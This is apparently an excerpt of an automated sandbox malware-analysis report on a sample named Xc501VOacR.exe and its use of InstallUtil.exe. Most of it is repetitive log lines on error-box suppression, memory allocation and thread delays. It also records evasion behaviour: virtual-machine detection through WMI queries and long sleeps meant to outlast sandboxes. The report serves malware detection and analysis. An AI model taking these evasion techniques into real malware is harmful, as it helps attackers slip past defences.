                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Yara detected AntiVM3
                        Source: Yara matchFile source: Process Memory Space: Xc501VOacR.exe PID: 2228, type: MEMORYSTR
                        Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeMemory allocated: 2BE0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeMemory allocated: 2DF0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeMemory allocated: 2BE0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeMemory allocated: 8390000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeMemory allocated: 9390000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeMemory allocated: 9560000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeMemory allocated: A560000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeMemory allocated: A900000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeMemory allocated: B900000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeMemory allocated: C900000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 1090000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2D50000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 13B0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599875Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599766Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599547Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599438Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599313Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599203Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599094Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598969Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598860Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598735Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598610Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598485Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598360Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598235Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598110Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597985Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597860Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597735Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597610Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597485Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597360Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597235Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597110Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596985Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596860Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596735Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596621Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596500Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596391Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596266Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596157Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596032Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595907Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595797Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595688Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595563Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595438Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595313Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595188Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595078Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594969Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594844Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594735Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594610Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594485Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594360Jump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeWindow / User API: threadDelayed 7350Jump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeWindow / User API: threadDelayed 2487Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 1026Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 8805Jump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exe TID: 1476Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exe TID: 1476Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7128Thread sleep count: 1026 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7128Thread sleep count: 8805 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep count: 31 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -28592453314249787s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -600000s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -599875s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -599766s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -599656s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -599547s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -599438s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -599313s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -599203s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -599094s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -598969s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -598860s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -598735s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -598610s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -598485s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -598360s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -598235s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -598110s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -597985s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -597860s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -597735s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -597610s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -597485s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -597360s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -597235s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -597110s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -596985s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -596860s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -596735s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -596621s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -596500s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -596391s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -596266s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -596157s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -596032s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -595907s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -595797s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -595688s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -595563s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -595438s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -595313s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -595188s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -595078s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -594969s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -594844s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -594735s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -594610s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -594485s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep time: -594360s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeThread delayed: delay time: 30000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599875Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599766Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599547Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599438Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599313Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599203Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599094Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598969Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598860Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598735Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598610Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598485Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598360Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598235Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598110Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597985Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597860Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597735Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597610Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597485Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597360Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597235Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597110Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596985Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596860Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596735Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596621Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596500Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596391Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596266Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596157Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596032Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595907Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595797Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595688Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595563Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595438Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595313Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595188Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595078Jump to behavior
